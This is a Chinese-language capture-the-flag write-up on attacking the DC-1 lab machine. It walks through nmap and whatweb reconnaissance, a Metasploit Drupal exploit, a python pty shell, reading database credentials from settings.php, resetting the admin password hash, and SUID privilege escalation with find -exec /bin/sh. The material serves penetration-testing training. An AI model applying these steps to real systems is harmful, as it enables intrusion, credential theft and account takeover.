靶机DC-1攻略
- 实验环境搭建
1.1、所需工具
1.1.1、vbox:用于虚拟环境搭建
1.1.2、Kali操作系统:攻击机
1.1.3、DC-1:攻击目标靶机
1.2、环境配置
1.2.1网络配置:网络均采用桥接模式保证网络在同一个段
Kali的IP为:192.168.1.6
DC-1的IP未知需要自己获取
- 渗透步骤
2.1信息收集
2.1.1获取目标IP
DC-1的IP是未知的使用nmap -sP 来获取
分析可知DC-1的IP为192.168.1.7
得知IP后使用nmap -A查看靶机开启的端口
一共开启三个端口ssh、http和111,可以先尝试访问http
可以使用whatweb -v 192.168.1.7分析平台架构获取平台信息
2.2漏洞查询
2.2.1进入msfconsole
2.2.2使用search Drupa查找对应的漏洞模块
2.2.3找到可利用点
2.2.4 利用use使用的漏洞
2.2.5使用show options 检查利用漏洞所需要的配置
2.3开始进行渗透测试
2.3.1 使用set RHOSTS建立攻击机和靶机之间的联系
2.3.2 使用exploit启动链接
2.3.3 使用sysinfo查看DC-1的基本信息
2.3.4 获得shell
2.3.5为了方便查看使用python进行反弹python -c 'import pty;pty.spawn("/bin/bash")'
3.1获取flag
3.1.1cat flag1.txt(小彩蛋)*每个好的CMS都需要一个配置文件-你也是。*
3.1.2查看配置文件cat ./sites/default/settings.php
3.1.3利用查找到的数据库文件尝试登录
3.1.4成功登录对方数据库后查看对方数据库
3.1.5进入到数据库中
3.1.6查看表show tables;(发现users表)
3.1.7查看表中内容select * from users\G;
3.1.8admin的密码给加密,需要找到加密文件find . -name “*hash*”并且运行该文件./scripts/password-hash.sh
直接再后面加密码就会返回加密后的结果
3.1.9简单测试是否能修改./scripts/password-hash.sh 123456
3.1.10在web界面查看是否修改成功
4.1使用SUID提权
4.1.1查看初始权限(whoami)
4.1.2使用find / -name cron.php -exec "/bin/sh" \;提权
5.1获取最终权限
5.1.1进入root 查看文件
5.1.2获取最终flag
6总结
1.nmap,arp-scan使用
2.whatweb 指纹识别
3.msf使用对应的模块
4.mysql的修改数据
5.SUID提权